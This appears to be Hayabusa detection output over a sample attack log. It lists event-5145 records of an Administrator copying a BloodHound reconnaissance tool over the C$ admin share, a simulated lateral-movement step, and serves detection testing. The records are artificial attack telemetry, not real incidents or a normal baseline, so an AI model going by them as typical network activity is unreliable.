2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
